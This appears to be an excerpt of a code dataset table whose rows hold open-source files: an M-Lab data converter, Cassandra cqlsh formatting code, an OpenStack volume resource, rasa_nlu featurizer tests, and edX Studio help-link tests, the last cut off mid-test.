repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
mtlynch/mlab-observatory | convert_from_telescope/convert_from_telescope.py | 1 | 7124 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# Copyright 2015 Measurement Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts Telescope output files into data files for M-Lab Observatory."""
import argparse
import datetime
import glob
import logging
import os
import convert
import observatory_file_writer
import reducer
import result_grouper
import sample_checking
import whitelister
def setup_logger():
logger = logging.getLogger('telescope-convert')
console_handler = logging.StreamHandler()
logger.addHandler(console_handler)
logger.setLevel(logging.INFO)
return logger
def read_whitelist(whitelist_filename):
"""Read the whitelist file."""
with open(whitelist_filename) as whitelist_file:
deserializer = whitelister.MetadataWhitelistSerializer()
return deserializer.deserialize(whitelist_file)
def update_whitelist(whitelist_filename, sample_count_checker,
input_filenames):
"""Update the whitelist file with new datasets.
Update the whitelist file to include any new datasets that currently meet the
sample size requirements.
Args:
whitelist_filename: (str) Filename of whitelist file to update.
sample_count_checker: (sample_checking.SampleCounter) Sample counter to
check sample size requirements.
input_filenames: (list) A list of filenames from which to find datasets to
add to the whitelist.
Returns:
(whitelister.MetadataWhitelist) Updated whitelist object.
"""
whitelist = read_whitelist(whitelist_filename)
updater = whitelister.MetadataWhitelistUpdater(whitelist,
sample_count_checker)
if updater.update(input_filenames):
with open(whitelist_filename, 'w') as whitelist_file:
serializer = whitelister.MetadataWhitelistSerializer()
serializer.serialize(whitelist, whitelist_file)
return whitelist
def filter_files(whitelist, input_filenames):
"""Filter out the inputs that do not meet sample size requirements.
Preprocesses Telescope data files to filter out the result sets that do not
meet sample size requirements.
Args:
whitelist: (whitelister.MetadataWhitelist) Whitelist to use for filtering.
input_filenames: (list) Names of files to preprocess.
Returns:
(list) A list of filenames that meet the sample size requirements.
"""
file_checker = whitelister.DataFileWhitelistChecker(whitelist)
return [filename for filename in input_filenames
if file_checker.is_whitelisted(filename)]
def perform_conversion(input_filenames, output_dir):
"""Converts Telescope files to Observatory format.
Args:
input_filenames: (list) A list of raw Telescope output files to convert.
output_dir: (str) Directory in which to place converted Observatory files.
"""
median_reducer = reducer.MedianReducer()
file_writer = observatory_file_writer.ObservatoryFileWriter()
per_site_result_grouper = result_grouper.PerSiteTelescopeResultGrouper()
per_site_output_dir = os.path.join(output_dir, 'data', 'exploreData')
per_site_valid_keys_path = os.path.join(output_dir,
'metadata',
'validExploreKeys.txt')
per_site_converter = convert.ResultConverter(per_site_result_grouper,
median_reducer,
file_writer,
per_site_output_dir,
per_site_valid_keys_path)
per_metro_result_grouper = result_grouper.PerMetroTelescopeResultGrouper()
per_metro_output_dir = os.path.join(output_dir, 'data', 'compareData')
per_metro_valid_keys_path = os.path.join(output_dir,
'metadata',
'validCompareKeys.txt')
per_metro_converter = convert.ResultConverter(per_metro_result_grouper,
median_reducer,
file_writer,
per_metro_output_dir,
per_metro_valid_keys_path)
for converter in (per_site_converter, per_metro_converter):
converter.convert_to_observatory_format(input_filenames)
def main(args):
logger = setup_logger()
program_start_time = datetime.datetime.utcnow()
input_files = glob.glob(args.input_pattern)
if not args.no_whitelist_update:
logger.info('Updating dataset whitelist.')
now = datetime.datetime.utcnow()
end_time = datetime.datetime(now.year, now.month, 1)
min_samples_per_day = int(args.samples_per_day)
percentage_of_days_threshold = float(args.percentage_valid_days)
sample_counter = sample_checking.SampleCounter()
sample_checker = sample_checking.SampleCountChecker(
sample_counter, end_time, min_samples_per_day,
percentage_of_days_threshold)
whitelist = update_whitelist(args.whitelist, sample_checker, input_files)
else:
whitelist = read_whitelist(args.whitelist)
filtered_files = filter_files(whitelist, input_files)
perform_conversion(filtered_files, args.output)
program_end_time = datetime.datetime.utcnow()
runtime_mins = (program_end_time - program_start_time).total_seconds() / 60.0
logger.info('Conversion completed in %.1f minutes.', runtime_mins)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
prog='Observatory Data Preparation Tool',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-i', '--input_pattern', default=None,
help=('Input pattern (in quotes) specifying CSV '
'datafile(s) to merge.'))
parser.add_argument('-o', '--output', default='../static/observatory/',
help='Output path.')
parser.add_argument('--samples_per_day', default='30',
help='Minimum number of samples required per day.')
parser.add_argument('--percentage_valid_days', default='0.80',
help='Required percentage of valid days.')
parser.add_argument('--whitelist',
default='../static/observatory/metadata/whitelist.txt',
help='Whitelist of datasets to include in results.')
parser.add_argument('--no_whitelist_update', default=False,
action='store_true',
help=('Skips check that datasets meet sample count '
'minimums.'))
main(parser.parse_args())
| apache-2.0 |
aarushi12002/cassandra | pylib/cqlshlib/formatting.py | 17 | 11961 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import calendar
import math
import platform
import re
import sys
import platform
from collections import defaultdict
from . import wcwidth
from .displaying import colorme, FormattedValue, DEFAULT_VALUE_COLORS
from cassandra.cqltypes import EMPTY
from cassandra.util import datetime_from_timestamp
from util import UTC
is_win = platform.system() == 'Windows'
unicode_controlchars_re = re.compile(r'[\x00-\x31\x7f-\xa0]')
controlchars_re = re.compile(r'[\x00-\x31\x7f-\xff]')
def _show_control_chars(match):
txt = repr(match.group(0))
if txt.startswith('u'):
txt = txt[2:-1]
else:
txt = txt[1:-1]
return txt
bits_to_turn_red_re = re.compile(r'\\([^uUx]|u[0-9a-fA-F]{4}|x[0-9a-fA-F]{2}|U[0-9a-fA-F]{8})')
def _make_turn_bits_red_f(color1, color2):
def _turn_bits_red(match):
txt = match.group(0)
if txt == '\\\\':
return '\\'
return color1 + txt + color2
return _turn_bits_red
default_null_placeholder = 'null'
default_float_precision = 3
default_colormap = DEFAULT_VALUE_COLORS
empty_colormap = defaultdict(lambda: '')
def format_by_type(cqltype, val, encoding, colormap=None, addcolor=False,
nullval=None, date_time_format=None, float_precision=None):
if nullval is None:
nullval = default_null_placeholder
if val is None:
return colorme(nullval, colormap, 'error')
if addcolor is False:
colormap = empty_colormap
elif colormap is None:
colormap = default_colormap
if date_time_format is None:
date_time_format = DateTimeFormat()
if float_precision is None:
float_precision = default_float_precision
return format_value(cqltype, val, encoding=encoding, colormap=colormap,
date_time_format=date_time_format, float_precision=float_precision,
nullval=nullval)
def color_text(bval, colormap, displaywidth=None):
# note that here, we render natural backslashes as just backslashes,
# in the same color as surrounding text, when using color. When not
# using color, we need to double up the backslashes so it's not
# ambiguous. This introduces the unique difficulty of having different
# display widths for the colored and non-colored versions. To avoid
# adding the smarts to handle that in to FormattedValue, we just
# make an explicit check to see if a null colormap is being used or
# not.
if displaywidth is None:
displaywidth = len(bval)
tbr = _make_turn_bits_red_f(colormap['blob'], colormap['text'])
coloredval = colormap['text'] + bits_to_turn_red_re.sub(tbr, bval) + colormap['reset']
if colormap['text']:
displaywidth -= bval.count(r'\\')
return FormattedValue(bval, coloredval, displaywidth)
DEFAULT_NANOTIME_FORMAT = '%H:%M:%S.%N'
DEFAULT_DATE_FORMAT = '%Y-%m-%d'
DEFAULT_TIMESTAMP_FORMAT = '%Y-%m-%d %H:%M:%S%z'
if platform.system() == 'Windows':
DEFAULT_TIME_FORMAT = '%Y-%m-%d %H:%M:%S %Z'
class DateTimeFormat():
def __init__(self, timestamp_format=DEFAULT_TIMESTAMP_FORMAT, date_format=DEFAULT_DATE_FORMAT, nanotime_format=DEFAULT_NANOTIME_FORMAT):
self.timestamp_format = timestamp_format
self.date_format = date_format
self.nanotime_format = nanotime_format
def format_value_default(val, colormap, **_):
val = str(val)
escapedval = val.replace('\\', '\\\\')
bval = controlchars_re.sub(_show_control_chars, escapedval)
return color_text(bval, colormap)
# Mapping cql type base names ("int", "map", etc) to formatter functions,
# making format_value a generic function
_formatters = {}
def format_value(type, val, **kwargs):
if val == EMPTY:
return format_value_default('', **kwargs)
formatter = _formatters.get(type.__name__, format_value_default)
return formatter(val, **kwargs)
def formatter_for(typname):
def registrator(f):
_formatters[typname] = f
return f
return registrator
@formatter_for('bytearray')
def format_value_blob(val, colormap, **_):
bval = '0x' + ''.join('%02x' % c for c in val)
return colorme(bval, colormap, 'blob')
formatter_for('buffer')(format_value_blob)
def format_python_formatted_type(val, colormap, color, quote=False):
bval = str(val)
if quote:
bval = "'%s'" % bval
return colorme(bval, colormap, color)
@formatter_for('Decimal')
def format_value_decimal(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'decimal')
@formatter_for('UUID')
def format_value_uuid(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'uuid')
@formatter_for('inet')
def formatter_value_inet(val, colormap, quote=False, **_):
return format_python_formatted_type(val, colormap, 'inet', quote=quote)
@formatter_for('bool')
def format_value_boolean(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'boolean')
def format_floating_point_type(val, colormap, float_precision, **_):
if math.isnan(val):
bval = 'NaN'
elif math.isinf(val):
bval = 'Infinity'
else:
exponent = int(math.log10(abs(val))) if abs(val) > sys.float_info.epsilon else -sys.maxsize - 1
if -4 <= exponent < float_precision:
# when this is true %g will not use scientific notation,
# increasing precision should not change this decision
# so we increase the precision to take into account the
# digits to the left of the decimal point
float_precision = float_precision + exponent + 1
bval = '%.*g' % (float_precision, val)
return colorme(bval, colormap, 'float')
formatter_for('float')(format_floating_point_type)
def format_integer_type(val, colormap, **_):
# base-10 only for now; support others?
bval = str(val)
return colorme(bval, colormap, 'int')
formatter_for('long')(format_integer_type)
formatter_for('int')(format_integer_type)
@formatter_for('datetime')
def format_value_timestamp(val, colormap, date_time_format, quote=False, **_):
bval = strftime(date_time_format.timestamp_format, calendar.timegm(val.utctimetuple()))
if quote:
bval = "'%s'" % bval
return colorme(bval, colormap, 'timestamp')
def strftime(time_format, seconds):
tzless_dt = datetime_from_timestamp(seconds)
return tzless_dt.replace(tzinfo=UTC()).strftime(time_format)
@formatter_for('Date')
def format_value_date(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'date')
@formatter_for('Time')
def format_value_time(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'time')
@formatter_for('str')
def format_value_text(val, encoding, colormap, quote=False, **_):
escapedval = val.replace(u'\\', u'\\\\')
if quote:
escapedval = escapedval.replace("'", "''")
escapedval = unicode_controlchars_re.sub(_show_control_chars, escapedval)
bval = escapedval.encode(encoding, 'backslashreplace')
if quote:
bval = "'%s'" % bval
displaywidth = wcwidth.wcswidth(bval.decode(encoding))
return color_text(bval, colormap, displaywidth)
# name alias
formatter_for('unicode')(format_value_text)
def format_simple_collection(val, lbracket, rbracket, encoding,
colormap, date_time_format, float_precision, nullval):
subs = [format_value(type(sval), sval, encoding=encoding, colormap=colormap,
date_time_format=date_time_format, float_precision=float_precision,
nullval=nullval, quote=True)
for sval in val]
bval = lbracket + ', '.join(sval.strval for sval in subs) + rbracket
lb, sep, rb = [colormap['collection'] + s + colormap['reset']
for s in (lbracket, ', ', rbracket)]
coloredval = lb + sep.join(sval.coloredval for sval in subs) + rb
displaywidth = 2 * len(subs) + sum(sval.displaywidth for sval in subs)
return FormattedValue(bval, coloredval, displaywidth)
@formatter_for('list')
def format_value_list(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
return format_simple_collection(val, '[', ']', encoding, colormap,
date_time_format, float_precision, nullval)
@formatter_for('tuple')
def format_value_tuple(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
return format_simple_collection(val, '(', ')', encoding, colormap,
date_time_format, float_precision, nullval)
@formatter_for('set')
def format_value_set(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
return format_simple_collection(sorted(val), '{', '}', encoding, colormap,
date_time_format, float_precision, nullval)
formatter_for('frozenset')(format_value_set)
formatter_for('sortedset')(format_value_set)
@formatter_for('dict')
def format_value_map(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
def subformat(v):
return format_value(type(v), v, encoding=encoding, colormap=colormap,
date_time_format=date_time_format, float_precision=float_precision,
nullval=nullval, quote=True)
subs = [(subformat(k), subformat(v)) for (k, v) in sorted(val.items())]
bval = '{' + ', '.join(k.strval + ': ' + v.strval for (k, v) in subs) + '}'
lb, comma, colon, rb = [colormap['collection'] + s + colormap['reset']
for s in ('{', ', ', ': ', '}')]
coloredval = lb \
+ comma.join(k.coloredval + colon + v.coloredval for (k, v) in subs) \
+ rb
displaywidth = 4 * len(subs) + sum(k.displaywidth + v.displaywidth for (k, v) in subs)
return FormattedValue(bval, coloredval, displaywidth)
formatter_for('OrderedDict')(format_value_map)
formatter_for('OrderedMap')(format_value_map)
formatter_for('OrderedMapSerializedKey')(format_value_map)
def format_value_utype(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
def format_field_value(v):
if v is None:
return colorme(nullval, colormap, 'error')
return format_value(type(v), v, encoding=encoding, colormap=colormap,
date_time_format=date_time_format, float_precision=float_precision,
nullval=nullval, quote=True)
def format_field_name(name):
return format_value_text(name, encoding=encoding, colormap=colormap, quote=False)
subs = [(format_field_name(k), format_field_value(v)) for (k, v) in val._asdict().items()]
bval = '{' + ', '.join(k.strval + ': ' + v.strval for (k, v) in subs) + '}'
lb, comma, colon, rb = [colormap['collection'] + s + colormap['reset']
for s in ('{', ', ', ': ', '}')]
coloredval = lb \
+ comma.join(k.coloredval + colon + v.coloredval for (k, v) in subs) \
+ rb
displaywidth = 4 * len(subs) + sum(k.displaywidth + v.displaywidth for (k, v) in subs)
return FormattedValue(bval, coloredval, displaywidth)
| apache-2.0 |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/openstack/block_store/v2/volume.py | 3 | 4149 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.block_store import block_store_service
from openstack import resource
class Volume(resource.Resource):
resource_key = "volume"
resources_key = "volumes"
base_path = "/volumes"
service = block_store_service.BlockStoreService()
# capabilities
allow_retrieve = True
allow_create = True
allow_delete = True
allow_update = True
# Properties
#: A UUID representing this volume.
id = resource.prop("id")
#: The name of this volume.
name = resource.prop("name")
#: A list of links associated with this volume. *Type: list*
links = resource.prop("links", type=list)
#: The availability zone.
availability_zone = resource.prop("availability_zone")
#: To create a volume from an existing volume, specify the ID of
#: the existing volume. If specified, the volume is created with
#: same size of the source volume.
source_volume = resource.prop("source_volid")
#: The volume description.
description = resource.prop("description")
#: To create a volume from an existing snapshot, specify the ID of
#: the existing volume snapshot. If specified, the volume is created
#: in same availability zone and with same size of the snapshot.
snapshot = resource.prop("snapshot_id")
#: The size of the volume, in GBs. *Type: int*
size = resource.prop("size", type=int)
#: The ID of the image from which you want to create the volume.
#: Required to create a bootable volume.
image = resource.prop("imageRef")
#: The associated volume type.
type = resource.prop("volume_type")
#: Enables or disables the bootable attribute. You can boot an
#: instance from a bootable volume. *Type: bool*
bootable = resource.prop("bootable", type=bool)
#: One or more metadata key and value pairs to associate with the volume.
metadata = resource.prop("metadata")
#: One of the following values: creating, available, attaching, in-use
#: deleting, error, error_deleting, backing-up, restoring-backup,
#: error_restoring. For details on these statuses, see the
#: Block Storage API documentation.
status = resource.prop("status")
#: TODO(briancurtin): This is currently undocumented in the API.
attachments = resource.prop("attachments")
#: The time this volume was created at.
created = resource.prop("created_at")
class VolumeDetail(Volume):
base_path = "/volumes/detail"
#: The volume's current back-end.
host = resource.prop("os-vol-host-attr:host")
#: The project ID associated with current back-end.
project_id = resource.prop("os-vol-tenant-attr:tenant_id")
#: The status of this volume's migration (None means that a migration
#: is not currently in progress).
migration_status = resource.prop("os-vol-mig-status-attr:migstat")
#: The volume ID that this volume's name on the back-end is based on.
migration_id = resource.prop("os-vol-mig-status-attr:name_id")
#: Status of replication on this volume.
replication_status = resource.prop("replication_status")
#: Extended replication status on this volume.
extended_replication_status = resource.prop(
"os-volume-replication:extended_status")
#: ID of the consistency group.
consistency_group = resource.prop("consistencygroup_id")
#: Data set by the replication driver
replication_driver_data = resource.prop(
"os-volume-replication:driver_data")
#: ``True`` if this volume is encrypted, ``False`` if not. *Type: bool*
encrypted = resource.prop("encrypted", type=bool)
| mit |
beeva-fernandocerezal/rasa_nlu | _pytest/test_featurizers.py | 2 | 4141 | from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import os
import numpy as np
import pytest
from rasa_nlu.tokenizers.mitie_tokenizer import MitieTokenizer
from rasa_nlu.tokenizers.spacy_tokenizer import SpacyTokenizer
from rasa_nlu.training_data import Message
@pytest.mark.parametrize("sentence, expected", [
("hey how are you today", [-0.19649599, 0.32493639, -0.37408298, -0.10622784, 0.062756])
])
def test_spacy_featurizer(sentence, expected, spacy_nlp):
from rasa_nlu.featurizers.spacy_featurizer import SpacyFeaturizer
ftr = SpacyFeaturizer()
doc = spacy_nlp(sentence)
vecs = ftr.features_for_doc(doc)
assert np.allclose(doc.vector[:5], expected, atol=1e-5)
assert np.allclose(vecs, doc.vector, atol=1e-5)
def test_mitie_featurizer(mitie_feature_extractor, default_config):
from rasa_nlu.featurizers.mitie_featurizer import MitieFeaturizer
default_config["mitie_file"] = os.environ.get('MITIE_FILE')
if not default_config["mitie_file"] or not os.path.isfile(default_config["mitie_file"]):
default_config["mitie_file"] = os.path.join("data", "total_word_feature_extractor.dat")
ftr = MitieFeaturizer.load()
sentence = "Hey how are you today"
tokens = MitieTokenizer().tokenize(sentence)
vecs = ftr.features_for_tokens(tokens, mitie_feature_extractor)
assert np.allclose(vecs[:5], np.array([0., -4.4551446, 0.26073121, -1.46632245, -1.84205751]), atol=1e-5)
def test_ngram_featurizer(spacy_nlp):
from rasa_nlu.featurizers.ngram_featurizer import NGramFeaturizer
ftr = NGramFeaturizer()
repetition_factor = 5 # ensures that during random sampling of the ngram CV we don't end up with a one-class-split
labeled_sentences = [
Message("heyheyheyhey", {"intent": "greet", "text_features": [0.5]}),
Message("howdyheyhowdy", {"intent": "greet", "text_features": [0.5]}),
Message("heyhey howdyheyhowdy", {"intent": "greet", "text_features": [0.5]}),
Message("howdyheyhowdy heyhey", {"intent": "greet", "text_features": [0.5]}),
Message("astalavistasista", {"intent": "goodby", "text_features": [0.5]}),
Message("astalavistasista sistala", {"intent": "goodby", "text_features": [0.5]}),
Message("sistala astalavistasista", {"intent": "goodby", "text_features": [0.5]}),
] * repetition_factor
for m in labeled_sentences:
m.set("spacy_doc", spacy_nlp(m.text))
ftr.min_intent_examples_for_ngram_classification = 2
ftr.train_on_sentences(labeled_sentences,
max_number_of_ngrams=10)
assert len(ftr.all_ngrams) > 0
assert ftr.best_num_ngrams > 0
@pytest.mark.parametrize("sentence, expected, labeled_tokens", [
("hey how are you today", [0., 1.], [0]),
("hey 123 how are you", [1., 1.], [0, 1]),
("blah balh random eh", [0., 0.], []),
("looks really like 123 today", [1., 0.], [3]),
])
def test_regex_featurizer(sentence, expected, labeled_tokens, spacy_nlp):
from rasa_nlu.featurizers.regex_featurizer import RegexFeaturizer
patterns = [
{"pattern": '[0-9]+', "name": "number", "usage": "intent"},
{"pattern": '\\bhey*', "name": "hello", "usage": "intent"}
]
ftr = RegexFeaturizer(patterns)
# adds tokens to the message
tokenizer = SpacyTokenizer()
message = Message(sentence)
message.set("spacy_doc", spacy_nlp(sentence))
tokenizer.process(message)
result = ftr.features_for_patterns(message)
assert np.allclose(result, expected, atol=1e-10)
assert len(message.get("tokens", [])) > 0 # the tokenizer should have added tokens
for i, token in enumerate(message.get("tokens")):
if i in labeled_tokens:
assert token.get("pattern") in [0, 1]
else:
assert token.get("pattern") is None # if the token is not part of a regex the pattern should not be set
| apache-2.0 |
naresh21/synergetics-edx-platform | common/test/acceptance/tests/studio/test_studio_help.py | 3 | 49206 | """
Test the Studio help links.
"""
from nose.plugins.attrib import attr
from unittest import skip
from common.test.acceptance.fixtures.course import XBlockFixtureDesc
from common.test.acceptance.tests.studio.base_studio_test import StudioCourseTest, ContainerBase
from common.test.acceptance.pages.studio.index import DashboardPage, DashboardPageWithPrograms
from common.test.acceptance.pages.studio.utils import click_studio_help, studio_help_links
from common.test.acceptance.pages.studio.index import IndexPage, HomePage
from common.test.acceptance.tests.studio.base_studio_test import StudioLibraryTest
from common.test.acceptance.pages.studio.course_info import CourseUpdatesPage
from common.test.acceptance.pages.studio.utils import click_css
from common.test.acceptance.pages.studio.library import LibraryPage
from common.test.acceptance.pages.studio.users import LibraryUsersPage
from common.test.acceptance.pages.studio.overview import CourseOutlinePage
from common.test.acceptance.pages.studio.asset_index import AssetIndexPage
from common.test.acceptance.pages.studio.edit_tabs import PagesPage
from common.test.acceptance.pages.studio.textbook_upload import TextbookUploadPage
from common.test.acceptance.pages.studio.settings import SettingsPage
from common.test.acceptance.pages.studio.settings_graders import GradingPage
from common.test.acceptance.pages.studio.settings_group_configurations import GroupConfigurationsPage
from common.test.acceptance.pages.studio.settings_advanced import AdvancedSettingsPage
from common.test.acceptance.pages.studio.settings_certificates import CertificatesPage
from common.test.acceptance.pages.studio.import_export import ExportCoursePage, ImportCoursePage
from common.test.acceptance.pages.studio.users import CourseTeamPage
from common.test.acceptance.fixtures.programs import ProgramsConfigMixin
from common.test.acceptance.tests.helpers import (
AcceptanceTest,
assert_nav_help_link,
assert_side_bar_help_link
)
from common.test.acceptance.pages.studio.import_export import ExportLibraryPage, ImportLibraryPage
from common.test.acceptance.pages.studio.auto_auth import AutoAuthPage
@attr(shard=10)
class StudioHelpTest(StudioCourseTest):
"""Tests for Studio help."""
def test_studio_help_links(self):
"""Test that the help links are present and have the correct content."""
page = DashboardPage(self.browser)
page.visit()
click_studio_help(page)
links = studio_help_links(page)
expected_links = [{
'href': u'http://docs.edx.org/',
'text': u'edX Documentation',
'sr_text': u'Access documentation on http://docs.edx.org'
}, {
'href': u'https://open.edx.org/',
'text': u'Open edX Portal',
'sr_text': u'Access the Open edX Portal'
}, {
'href': u'https://www.edx.org/course/overview-creating-edx-course-edx-edx101#.VO4eaLPF-n1',
'text': u'Enroll in edX101',
'sr_text': u'Enroll in edX101: Overview of Creating an edX Course'
}, {
'href': u'https://www.edx.org/course/creating-course-edx-studio-edx-studiox',
'text': u'Enroll in StudioX',
'sr_text': u'Enroll in StudioX: Creating a Course with edX Studio'
}, {
'href': u'mailto:[email protected]',
'text': u'Contact Us',
'sr_text': 'Send an email to [email protected]'
}]
for expected, actual in zip(expected_links, links):
self.assertEqual(expected['href'], actual.get_attribute('href'))
self.assertEqual(expected['text'], actual.text)
self.assertEqual(
expected['sr_text'],
actual.find_element_by_xpath('following-sibling::span').text
)
@attr(shard=10)
class SignInHelpTest(AcceptanceTest):
"""
Tests help links on 'Sign In' page
"""
def setUp(self):
super(SignInHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_sign_in_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Sign In' page.
Given that I am on the 'Sign In" page.
And I want help about the sign in
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
sign_in_page = self.index_page.click_sign_in()
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=sign_in_page,
href=href,
signed_in=False
)
@attr(shard=10)
class SignUpHelpTest(AcceptanceTest):
"""
Tests help links on 'Sign Up' page.
"""
def setUp(self):
super(SignUpHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_sign_up_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Sign Up' page.
Given that I am on the 'Sign Up" page.
And I want help about the sign up
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
sign_up_page = self.index_page.click_sign_up()
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=sign_up_page,
href=href,
signed_in=False
)
@attr(shard=10)
class HomeHelpTest(StudioCourseTest):
"""
Tests help links on 'Home'(Courses tab) page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(HomeHelpTest, self).setUp()
self.home_page = HomePage(self.browser)
self.home_page.visit()
def test_course_home_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Home'(Courses tab) page.
Given that I am on the 'Home'(Courses tab) page.
And I want help about the courses
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.home_page,
href=href
)
def test_course_home_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Home'(Courses tab) page.
Given that I am on the 'Home'(Courses tab) page.
And I want help about the courses
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.home_page,
href=href,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class NewCourseHelpTest(AcceptanceTest):
"""
Test help links while creating a new course.
"""
def setUp(self):
super(NewCourseHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
self.assertTrue(self.dashboard_page.new_course_button.present)
self.dashboard_page.click_new_course_button()
def test_course_create_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Create a New Course' page in the dashboard.
Given that I am on the 'Create a New Course' page in the dashboard.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=href
)
def test_course_create_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Create a New Course' page in the dashboard.
Given that I am on the 'Create a New Course' page in the dashboard.
And I want help about the process
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.dashboard_page,
href=href,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class NewLibraryHelpTest(AcceptanceTest):
"""
Test help links while creating a new library
"""
def setUp(self):
super(NewLibraryHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
self.assertTrue(self.dashboard_page.has_new_library_button)
self.dashboard_page.click_new_library()
def test_library_create_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Create a New Library' page in the dashboard.
Given that I am on the 'Create a New Library' page in the dashboard.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=href
)
def test_library_create_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Create a New Library' page in the dashboard.
Given that I am on the 'Create a New Library' page in the dashboard.
And I want help about the process
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.dashboard_page,
href=href,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class LibraryTabHelpTest(AcceptanceTest):
"""
Test help links on the library tab present at dashboard.
"""
def setUp(self):
super(LibraryTabHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
def test_library_tab_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Home'(Courses tab) page.
Given that I am on the 'Home'(Courses tab) page.
